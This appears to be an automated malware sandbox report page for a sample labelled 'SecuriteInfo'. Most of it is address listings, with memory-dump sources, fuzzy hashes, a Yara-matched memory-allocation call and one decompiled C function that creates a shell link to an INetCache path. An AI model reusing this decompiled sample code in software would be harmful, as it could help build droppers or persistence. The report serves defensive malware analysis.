                                                                                                                          0x00406e1d
                                                                                                                          0x00406e23
                                                                                                                          0x00406ed6
                                                                                                                          0x00406edc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406ede
                                                                                                                          0x00406ee1
                                                                                                                          0x00406ee4
                                                                                                                          0x00406ee7
                                                                                                                          0x00406eea
                                                                                                                          0x00406eed
                                                                                                                          0x00406ef0
                                                                                                                          0x00406ef3
                                                                                                                          0x00406ef6
                                                                                                                          0x00406efc
                                                                                                                          0x00406f14
                                                                                                                          0x00406f17
                                                                                                                          0x00406f1a
                                                                                                                          0x00406f1d
                                                                                                                          0x00406f1d
                                                                                                                          0x00406f20
                                                                                                                          0x00406f26
                                                                                                                          0x00406efe
                                                                                                                          0x00406efe
                                                                                                                          0x00406f06
                                                                                                                          0x00406f0b
                                                                                                                          0x00406f0d
                                                                                                                          0x00406f0f
                                                                                                                          0x00406f0f
                                                                                                                          0x00406f30
                                                                                                                          0x00406f33
                                                                                                                          0x00406eb1
                                                                                                                          0x00406eb5
                                                                                                                          0x00407575
                                                                                                                          0x00000000
                                                                                                                          0x00407575
                                                                                                                          0x00406ebb
                                                                                                                          0x00406ebe
                                                                                                                          0x00406ec1
                                                                                                                          0x00406ec5
                                                                                                                          0x00406ec8
                                                                                                                          0x00406ece
                                                                                                                          0x00406ed0
                                                                                                                          0x00406ed0
                                                                                                                          0x00406ed3
                                                                                                                          0x00406ed3
                                                                                                                          0x00406f33
                                                                                                                          0x00406f3a
                                                                                                                          0x00406f3a
                                                                                                                          0x00406f3a
                                                                                                                          0x00406f3e
                                                                                                                          0x00406f3e
                                                                                                                          0x00406f41
                                                                                                                          0x00406f44
                                                                                                                          0x00406f48
                                                                                                                          0x0040758d
                                                                                                                          0x00000000
                                                                                                                          0x0040758d
                                                                                                                          0x00406f4e
                                                                                                                          0x00406f51
                                                                                                                          0x00406f54
                                                                                                                          0x00406f57
                                                                                                                          0x00406f5a
                                                                                                                          0x00406f5d
                                                                                                                          0x00406f60
                                                                                                                          0x00406f62
                                                                                                                          0x00406f65
                                                                                                                          0x00406f68
                                                                                                                          0x00406f6b
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x0040710a
                                                                                                                          0x0040710a
                                                                                                                          0x0040710d
                                                                                                                          0x0040710d
                                                                                                                          0x00000000
                                                                                                                          0x0040710d
                                                                                                                          0x00406e2f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406eac
                                                                                                                          0x00406df8
                                                                                                                          0x00406dfc
                                                                                                                          0x00407569
                                                                                                                          0x004075e5
                                                                                                                          0x004075ed
                                                                                                                          0x004075f4
                                                                                                                          0x004075f6
                                                                                                                          0x004075fd
                                                                                                                          0x00407601
                                                                                                                          0x00407601
                                                                                                                          0x00406e02
                                                                                                                          0x00406e05
                                                                                                                          0x00406e08
                                                                                                                          0x00406e0c
                                                                                                                          0x00406e0f
                                                                                                                          0x00406e15
                                                                                                                          0x00406e17
                                                                                                                          0x00406e17
                                                                                                                          0x00406e1a
                                                                                                                          0x00000000
                                                                                                                          0x00406e1a
                                                                                                                          0x00406ea6
                                                                                                                          0x00406daf
                                                                                                                          0x00406be3
                                                                                                                          0x00406be3
                                                                                                                          0x00406bec
                                                                                                                          0x004075fa
                                                                                                                          0x004075fa
                                                                                                                          0x00000000
                                                                                                                          0x004075fa
                                                                                                                          0x00406bf2
                                                                                                                          0x00000000
                                                                                                                          0x00406bfd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406c06
                                                                                                                          0x00406c09
                                                                                                                          0x00406c0c
                                                                                                                          0x00406c10
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406c16
                                                                                                                          0x00406c19
                                                                                                                          0x00406c1b
                                                                                                                          0x00406c1c
                                                                                                                          0x00406c1f
                                                                                                                          0x00406c21
                                                                                                                          0x00406c22
                                                                                                                          0x00406c24
                                                                                                                          0x00406c27
                                                                                                                          0x00406c2c
                                                                                                                          0x00406c31
                                                                                                                          0x00406c3a
                                                                                                                          0x00406c4d
                                                                                                                          0x00406c50
                                                                                                                          0x00406c5c
                                                                                                                          0x00406c84
                                                                                                                          0x00406c86
                                                                                                                          0x00406c94
                                                                                                                          0x00406c94
                                                                                                                          0x00406c98
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406c88
                                                                                                                          0x00406c88
                                                                                                                          0x00406c8b
                                                                                                                          0x00406c8c
                                                                                                                          0x00406c8c
                                                                                                                          0x00000000
                                                                                                                          0x00406c88
                                                                                                                          0x00406c62
                                                                                                                          0x00406c67
                                                                                                                          0x00406c67
                                                                                                                          0x00406c70
                                                                                                                          0x00406c78
                                                                                                                          0x00406c7b
                                                                                                                          0x00000000
                                                                                                                          0x00406c81
                                                                                                                          0x00406c81
                                                                                                                          0x00000000
                                                                                                                          0x00406c81
                                                                                                                          0x00000000
                                                                                                                          0x00406c9e
                                                                                                                          0x00406c9e
                                                                                                                          0x00406ca2
                                                                                                                          0x0040754e
                                                                                                                          0x00000000
                                                                                                                          0x0040754e
                                                                                                                          0x00406cab
                                                                                                                          0x00406cbb
                                                                                                                          0x00406cbe
                                                                                                                          0x00406cc1
                                                                                                                          0x00406cc1
                                                                                                                          0x00406cc1
                                                                                                                          0x00406cc4
                                                                                                                          0x00406cc8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406cca
                                                                                                                          0x00406cd0
                                                                                                                          0x00406cfa
                                                                                                                          0x00406d00
                                                                                                                          0x00406d07
                                                                                                                          0x00000000
                                                                                                                          0x00406d07
                                                                                                                          0x00406cd6
                                                                                                                          0x00406cd9
                                                                                                                          0x00406cde
                                                                                                                          0x00406cde
                                                                                                                          0x00406ce9
                                                                                                                          0x00406cf1
                                                                                                                          0x00406cf4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406d39
                                                                                                                          0x00406d3f
                                                                                                                          0x00406d42
                                                                                                                          0x00406d4f
                                                                                                                          0x00406d57
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406d0e
                                                                                                                          0x00406d0e
                                                                                                                          0x00406d12
                                                                                                                          0x0040755d
                                                                                                                          0x00000000
                                                                                                                          0x0040755d
                                                                                                                          0x00406d1e
                                                                                                                          0x00406d29
                                                                                                                          0x00406d29
                                                                                                                          0x00406d29
                                                                                                                          0x00406d2c
                                                                                                                          0x00406d2f
                                                                                                                          0x00406d32
                                                                                                                          0x00406d37
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406ffe
                                                                                                                          0x00407002
                                                                                                                          0x00407020
                                                                                                                          0x00407023
                                                                                                                          0x0040702a
                                                                                                                          0x0040702d
                                                                                                                          0x00407030
                                                                                                                          0x00407033
                                                                                                                          0x00407036
                                                                                                                          0x00407039
                                                                                                                          0x0040703b
                                                                                                                          0x00407042
                                                                                                                          0x00407043
                                                                                                                          0x00407045
                                                                                                                          0x00407048
                                                                                                                          0x0040704b
                                                                                                                          0x0040704e
                                                                                                                          0x0040704e
                                                                                                                          0x00407053
                                                                                                                          0x00000000
                                                                                                                          0x00407053
                                                                                                                          0x00407004
                                                                                                                          0x00407007
                                                                                                                          0x0040700a
                                                                                                                          0x00407014
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407068
                                                                                                                          0x0040706c
                                                                                                                          0x0040708f
                                                                                                                          0x00407092
                                                                                                                          0x00407095
                                                                                                                          0x0040709f
                                                                                                                          0x0040706e
                                                                                                                          0x0040706e
                                                                                                                          0x00407071
                                                                                                                          0x00407074
                                                                                                                          0x00407077
                                                                                                                          0x00407084
                                                                                                                          0x00407087
                                                                                                                          0x00407087
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070ab
                                                                                                                          0x004070af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070b5
                                                                                                                          0x004070b9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070bf
                                                                                                                          0x004070c1
                                                                                                                          0x004070c5
                                                                                                                          0x004070c5
                                                                                                                          0x004070c8
                                                                                                                          0x004070cc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040711c
                                                                                                                          0x00407120
                                                                                                                          0x00407127
                                                                                                                          0x0040712a
                                                                                                                          0x0040712d
                                                                                                                          0x00407137
                                                                                                                          0x00000000
                                                                                                                          0x00407137
                                                                                                                          0x00407122
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407143
                                                                                                                          0x00407147
                                                                                                                          0x0040714e
                                                                                                                          0x00407151
                                                                                                                          0x00407154
                                                                                                                          0x00407149
                                                                                                                          0x00407149
                                                                                                                          0x00407149
                                                                                                                          0x00407157
                                                                                                                          0x0040715a
                                                                                                                          0x0040715d
                                                                                                                          0x0040715d
                                                                                                                          0x00407160
                                                                                                                          0x00407163
                                                                                                                          0x00407166
                                                                                                                          0x00407166
                                                                                                                          0x00407169
                                                                                                                          0x00407170
                                                                                                                          0x00407175
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407203
                                                                                                                          0x00407203
                                                                                                                          0x00407207
                                                                                                                          0x004075a5
                                                                                                                          0x00000000
                                                                                                                          0x004075a5
                                                                                                                          0x0040720d
                                                                                                                          0x00407210
                                                                                                                          0x00407213
                                                                                                                          0x00407217
                                                                                                                          0x0040721a
                                                                                                                          0x00407220
                                                                                                                          0x00407222
                                                                                                                          0x00407222
                                                                                                                          0x00407222
                                                                                                                          0x00407225
                                                                                                                          0x00407228
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407286
                                                                                                                          0x00407286
                                                                                                                          0x0040728a
                                                                                                                          0x004075b1
                                                                                                                          0x00000000
                                                                                                                          0x004075b1
                                                                                                                          0x00407290
                                                                                                                          0x00407293
                                                                                                                          0x00407296
                                                                                                                          0x0040729a
                                                                                                                          0x0040729d
                                                                                                                          0x004072a3
                                                                                                                          0x004072a5
                                                                                                                          0x004072a5
                                                                                                                          0x004072a5
                                                                                                                          0x004072a8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407056
                                                                                                                          0x00407056
                                                                                                                          0x00407059
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407395
                                                                                                                          0x00407399
                                                                                                                          0x004073bb
                                                                                                                          0x004073be
                                                                                                                          0x004073c8
                                                                                                                          0x00000000
                                                                                                                          0x004073c8
                                                                                                                          0x0040739b
                                                                                                                          0x0040739e
                                                                                                                          0x004073a2
                                                                                                                          0x004073a5
                                                                                                                          0x004073a5
                                                                                                                          0x004073a8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407452
                                                                                                                          0x00407456
                                                                                                                          0x00407474
                                                                                                                          0x00407474
                                                                                                                          0x00407474
                                                                                                                          0x0040747b
                                                                                                                          0x00407482
                                                                                                                          0x00407489
                                                                                                                          0x00407489
                                                                                                                          0x00000000
                                                                                                                          0x00407489
                                                                                                                          0x00407458
                                                                                                                          0x0040745b
                                                                                                                          0x0040745e
                                                                                                                          0x00407461
                                                                                                                          0x00407468
                                                                                                                          0x004073ac
                                                                                                                          0x004073ac
                                                                                                                          0x004073af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407543
                                                                                                                          0x00407546
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040717d
                                                                                                                          0x0040717f
                                                                                                                          0x00407186
                                                                                                                          0x00407187
                                                                                                                          0x00407189
                                                                                                                          0x0040718c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407194
                                                                                                                          0x00407197
                                                                                                                          0x0040719a
                                                                                                                          0x0040719c
                                                                                                                          0x0040719e
                                                                                                                          0x0040719e
                                                                                                                          0x0040719f
                                                                                                                          0x004071a2
                                                                                                                          0x004071a9
                                                                                                                          0x004071ac
                                                                                                                          0x004071ba
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407490
                                                                                                                          0x00407490
                                                                                                                          0x00407493
                                                                                                                          0x0040749a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040749f
                                                                                                                          0x0040749f
                                                                                                                          0x004074a3
                                                                                                                          0x004075db
                                                                                                                          0x00000000
                                                                                                                          0x004075db
                                                                                                                          0x004074a9
                                                                                                                          0x004074ac
                                                                                                                          0x004074af
                                                                                                                          0x004074b3
                                                                                                                          0x004074b6
                                                                                                                          0x004074bc
                                                                                                                          0x004074be
                                                                                                                          0x004074be
                                                                                                                          0x004074be
                                                                                                                          0x004074c1
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c7
                                                                                                                          0x004074c7
                                                                                                                          0x004074cb
                                                                                                                          0x0040752b
                                                                                                                          0x0040752e
                                                                                                                          0x00407533
                                                                                                                          0x00407534
                                                                                                                          0x00407536
                                                                                                                          0x00407538
                                                                                                                          0x0040753b
                                                                                                                          0x00000000
                                                                                                                          0x0040753b
                                                                                                                          0x004074cd
                                                                                                                          0x004074d3
                                                                                                                          0x004074d6
                                                                                                                          0x004074d9
                                                                                                                          0x004074dc
                                                                                                                          0x004074df
                                                                                                                          0x004074e2
                                                                                                                          0x004074e5
                                                                                                                          0x004074e8
                                                                                                                          0x004074eb
                                                                                                                          0x004074ee
                                                                                                                          0x00407507
                                                                                                                          0x0040750a
                                                                                                                          0x0040750d
                                                                                                                          0x00407510
                                                                                                                          0x00407514
                                                                                                                          0x00407516
                                                                                                                          0x00407516
                                                                                                                          0x00407517
                                                                                                                          0x0040751a
                                                                                                                          0x004074f0
                                                                                                                          0x004074f0
                                                                                                                          0x004074f8
                                                                                                                          0x004074fd
                                                                                                                          0x004074ff
                                                                                                                          0x00407502
                                                                                                                          0x00407502
                                                                                                                          0x0040751d
                                                                                                                          0x00407524
                                                                                                                          0x00000000
                                                                                                                          0x00407526
                                                                                                                          0x00000000
                                                                                                                          0x00407526
                                                                                                                          0x00000000
                                                                                                                          0x004071c2
                                                                                                                          0x004071c5
                                                                                                                          0x004071fb
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732e
                                                                                                                          0x0040732e
                                                                                                                          0x00407331
                                                                                                                          0x00407333
                                                                                                                          0x004075bd
                                                                                                                          0x00000000
                                                                                                                          0x004075bd
                                                                                                                          0x00407339
                                                                                                                          0x0040733c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407342
                                                                                                                          0x00407346
                                                                                                                          0x00407349
                                                                                                                          0x00407349
                                                                                                                          0x00407349
                                                                                                                          0x00000000
                                                                                                                          0x00407349
                                                                                                                          0x004071c7
                                                                                                                          0x004071c9
                                                                                                                          0x004071cb
                                                                                                                          0x004071cd
                                                                                                                          0x004071d0
                                                                                                                          0x004071d1
                                                                                                                          0x004071d3
                                                                                                                          0x004071d5
                                                                                                                          0x004071d8
                                                                                                                          0x004071db
                                                                                                                          0x004071f1
                                                                                                                          0x004071f6
                                                                                                                          0x0040722e
                                                                                                                          0x0040722e
                                                                                                                          0x00407232
                                                                                                                          0x0040725e
                                                                                                                          0x00407260
                                                                                                                          0x00407267
                                                                                                                          0x0040726a
                                                                                                                          0x0040726d
                                                                                                                          0x0040726d
                                                                                                                          0x00407272
                                                                                                                          0x00407272
                                                                                                                          0x00407274
                                                                                                                          0x00407277
                                                                                                                          0x0040727e
                                                                                                                          0x00407281
                                                                                                                          0x004072ae
                                                                                                                          0x004072ae
                                                                                                                          0x004072b1
                                                                                                                          0x004072b4
                                                                                                                          0x00407328
                                                                                                                          0x00407328
                                                                                                                          0x00407328
                                                                                                                          0x00000000
                                                                                                                          0x00407328
                                                                                                                          0x004072b6
                                                                                                                          0x004072bc
                                                                                                                          0x004072bf
                                                                                                                          0x004072c2
                                                                                                                          0x004072c5
                                                                                                                          0x004072c8
                                                                                                                          0x004072cb
                                                                                                                          0x004072ce
                                                                                                                          0x004072d1
                                                                                                                          0x004072d4
                                                                                                                          0x004072d7
                                                                                                                          0x004072f0
                                                                                                                          0x004072f2
                                                                                                                          0x004072f5
                                                                                                                          0x004072f6
                                                                                                                          0x004072f9
                                                                                                                          0x004072fb
                                                                                                                          0x004072fe
                                                                                                                          0x00407300
                                                                                                                          0x00407302
                                                                                                                          0x00407305
                                                                                                                          0x00407307
                                                                                                                          0x0040730a
                                                                                                                          0x0040730e
                                                                                                                          0x00407310
                                                                                                                          0x00407310
                                                                                                                          0x00407311
                                                                                                                          0x00407314
                                                                                                                          0x00407317
                                                                                                                          0x004072d9
                                                                                                                          0x004072d9
                                                                                                                          0x004072e1
                                                                                                                          0x004072e6
                                                                                                                          0x004072e8
                                                                                                                          0x004072eb
                                                                                                                          0x004072eb
                                                                                                                          0x0040731a
                                                                                                                          0x00407321
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00407321
                                                                                                                          0x00407234
                                                                                                                          0x00407237
                                                                                                                          0x00407239
                                                                                                                          0x0040723c
                                                                                                                          0x0040723f
                                                                                                                          0x00407242
                                                                                                                          0x00407244
                                                                                                                          0x00407247
                                                                                                                          0x0040724a
                                                                                                                          0x0040724a
                                                                                                                          0x0040724d
                                                                                                                          0x0040724d
                                                                                                                          0x00407250
                                                                                                                          0x00407257
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00407257
                                                                                                                          0x004071dd
                                                                                                                          0x004071e0
                                                                                                                          0x004071e2
                                                                                                                          0x004071e5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070cf
                                                                                                                          0x004070cf
                                                                                                                          0x004070d3
                                                                                                                          0x00407599
                                                                                                                          0x00000000
                                                                                                                          0x00407599
                                                                                                                          0x004070d9
                                                                                                                          0x004070dc
                                                                                                                          0x004070df
                                                                                                                          0x004070e2
                                                                                                                          0x004070e4
                                                                                                                          0x004070e4
                                                                                                                          0x004070e4
                                                                                                                          0x004070e7
                                                                                                                          0x004070ea
                                                                                                                          0x004070ed
                                                                                                                          0x004070f0
                                                                                                                          0x004070f3
                                                                                                                          0x004070f6
                                                                                                                          0x004070f7
                                                                                                                          0x004070f9
                                                                                                                          0x004070f9
                                                                                                                          0x004070f9
                                                                                                                          0x004070fc
                                                                                                                          0x004070ff
                                                                                                                          0x00407102
                                                                                                                          0x00407105
                                                                                                                          0x00407105
                                                                                                                          0x00407105
                                                                                                                          0x00407108
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x00407350
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407356
                                                                                                                          0x00407359
                                                                                                                          0x0040735c
                                                                                                                          0x0040735f
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407364
                                                                                                                          0x00407367
                                                                                                                          0x0040736a
                                                                                                                          0x0040736d
                                                                                                                          0x00407370
                                                                                                                          0x00407373
                                                                                                                          0x00407374
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407379
                                                                                                                          0x0040737c
                                                                                                                          0x0040737f
                                                                                                                          0x00407382
                                                                                                                          0x00407385
                                                                                                                          0x00407389
                                                                                                                          0x0040738b
                                                                                                                          0x0040738e
                                                                                                                          0x00000000
                                                                                                                          0x00407390
                                                                                                                          0x00000000
                                                                                                                          0x00407390
                                                                                                                          0x0040738e
                                                                                                                          0x004075c3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bf2

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                                                          • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                                                                          • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                                                          • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL ref: 034AD639
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID: s<
                                                                                                                          • API String ID: 2167126740-2412033744
                                                                                                                          • Opcode ID: 40611fd84011fc55a6f4b023d787b41f94f319a968a8b8ee6d93c8af7f2216f2
                                                                                                                          • Instruction ID: 232710a7208e0129b93e6d4032cb74d9f6cb152f548f0dd825ae2c08d18e2c08
                                                                                                                          • Opcode Fuzzy Hash: 40611fd84011fc55a6f4b023d787b41f94f319a968a8b8ee6d93c8af7f2216f2
                                                                                                                          • Instruction Fuzzy Hash: 2DB132756407498FDF70EE28CCA07EE37A6AF65350F94402EEC9ADF214D7318A858B46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 67%
                                                                                                                          			E004021AA(void* __eflags) {
                                                                                                                          				signed int _t52;
                                                                                                                          				void* _t56;
                                                                                                                          				intOrPtr* _t60;
                                                                                                                          				intOrPtr _t61;
                                                                                                                          				intOrPtr* _t62;
                                                                                                                          				intOrPtr* _t64;
                                                                                                                          				intOrPtr* _t66;
                                                                                                                          				intOrPtr* _t68;
                                                                                                                          				intOrPtr* _t70;
                                                                                                                          				intOrPtr* _t72;
                                                                                                                          				intOrPtr* _t74;
                                                                                                                          				intOrPtr* _t76;
                                                                                                                          				intOrPtr* _t78;
                                                                                                                          				intOrPtr* _t80;
                                                                                                                          				void* _t83;
                                                                                                                          				intOrPtr* _t91;
                                                                                                                          				signed int _t101;
                                                                                                                          				signed int _t105;
                                                                                                                          				void* _t107;
                                                                                                                          
                                                                                                                          				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                                                                                          				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                                                                                          				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                                                                                          				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                                                                                          				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                                                                                          				_t52 =  *(_t107 - 0x20);
                                                                                                                          				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                                                                          				_t101 = _t52 & 0x00008000;
                                                                                                                          				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                                                                          				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                                                                          				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                                                                          					E00402DA6(0x21);
                                                                                                                          				}
                                                                                                                          				_t56 = _t107 + 8;
                                                                                                                          				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56); // executed
                                                                                                                          				if(_t56 < _t83) {
                                                                                                                          					L14:
                                                                                                                          					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                                                                          					_push(0xfffffff0);
                                                                                                                          				} else {
                                                                                                                          					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                          					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                                                                                          					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                                                                          					if(_t61 >= _t83) {
                                                                                                                          						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                          						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                                                                          						if(_t101 == _t83) {
                                                                                                                          							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                          							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Psychopharmacology");
                                                                                                                          						}
                                                                                                                          						if(_t105 != _t83) {
                                                                                                                          							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                          							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                                                                          						}
                                                                                                                          						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                          						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                                                                          						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                                                                          						if( *_t91 != _t83) {
                                                                                                                          							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                          							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                                                                          						}
                                                                                                                          						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                          						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                                                                          						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                          						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                                                                          						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                                                          							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                                                          							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                                                                          						}
                                                                                                                          						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                                                          						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                          					}
                                                                                                                          					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                          					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                                                          					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                                                          						_push(0xfffffff4);
                                                                                                                          					} else {
                                                                                                                          						goto L14;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				E00401423();
                                                                                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}






















                                                                                                                          0x004021b3
                                                                                                                          0x004021bd
                                                                                                                          0x004021c7
                                                                                                                          0x004021d1
                                                                                                                          0x004021dc
                                                                                                                          0x004021df
                                                                                                                          0x004021f9
                                                                                                                          0x004021fc
                                                                                                                          0x00402202
                                                                                                                          0x00402205
                                                                                                                          0x0040220f
                                                                                                                          0x00402213
                                                                                                                          0x00402213
                                                                                                                          0x00402218
                                                                                                                          0x00402229
                                                                                                                          0x00402231
                                                                                                                          0x004022e8
                                                                                                                          0x004022e8
                                                                                                                          0x004022ef
                                                                                                                          0x00402237
                                                                                                                          0x00402237
                                                                                                                          0x00402246
